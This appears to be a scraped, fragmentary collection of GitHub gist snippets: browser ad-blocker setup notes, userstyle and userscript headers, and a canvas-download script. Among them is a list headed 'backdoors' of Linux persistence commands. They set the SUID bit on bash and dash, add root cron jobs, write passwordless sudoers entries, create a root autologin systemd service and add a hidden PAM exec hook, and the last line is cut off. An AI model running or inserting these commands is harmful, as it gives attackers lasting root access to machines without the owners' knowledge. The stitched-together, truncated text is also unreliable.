https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/
Make sure the following options are off:
Disable pre-fetching
| # backdoors | |
| chmod u+s /bin/bash | |
| chmod u+s /bin/dash | |
| echo '* * * * * root chmod u+s /bin/bash' >> /etc/crontab | |
| echo '* * * * * root chmod u+s /bin/dash' >> /etc/crontab | |
| echo 'username ALL=(ALL) NOPASSWD: /bin/bash' | sudo tee /etc/sudoers.d/backdoor > /dev/null && sudo chown root:root /etc/sudoers.d/backdoor && sudo chmod 440 /etc/sudoers.d/backdoor && sudo visudo -c | |
| echo 'username ALL=(ALL) NOPASSWD: /bin/dash' | sudo tee /etc/sudoers.d/backdoor > /dev/null && sudo chown root:root /etc/sudoers.d/backdoor && sudo chmod 440 /etc/sudoers.d/backdoor && sudo visudo -c | |
| echo -e "[Service]\nExecStart=/sbin/agetty --autologin root --noclear tty8 linux\nRestart=always\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/backdoor.service && systemctl enable backdoor.service && systemctl start backdoor.service | |
| echo -e '#!/bin/bash\nchmod u+s /bin/bash' > /usr/local/bin/.backdoor && chmod +x /usr/local/bin/.backdoor && echo 'auth optional pam_exec.so expose_authtok /usr/local/bin/.backdoor' >> /etc/pam.d/common-a |
| /* ==UserStyle== | |
| @name Red X | |
| @namespace github.com/openstyles/stylus | |
| @version 1.0.0 | |
| @description my red X accent colour, based on idfk Some Extension lmao I can't remember | |
| @author Lucia Scarlet | |
| ==/UserStyle== */ | |
| @-moz-document domain("x.com") { | |
| /* Insert code here... */ |
| /* tiagorangel.com * If you use this, please credit me somewhere | |
| * Make sure to set the following variables: | |
| --foreground: r, g, b | |
| --background: r, g, b | |
| Example: | |
| --foreground: 13, 13, 14; | |
| --background: 255, 255, 255; | |
| */ |
https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/
Make sure the following options are off:
Disable pre-fetching| // ==UserScript== | |
| // @name Youtube SkipAd | |
| // @namespace keesiemeijer | |
| // @version 0.1 | |
| // @description Automatically skips ads after 5 seconds | |
| // @author keesiemeijer | |
| // @match https://www.youtube.com/* | |
| // @grant none | |
| // ==/UserScript== |
| // This code will automatically save the current canvas as a .png file. | |
| // Its useful as it can be placed in a loop to grab multiple canvas frames, I use it to create thumbnail gifs for my blog | |
| // Only seems to work with Chrome | |
| // Get the canvas | |
| var canvas = document.getElementById("canvas"); | |
| // Convert the canvas to data | |
| var image = canvas.toDataURL(); | |
| // Create a link | |
| var aDownloadLink = document.createElement('a'); |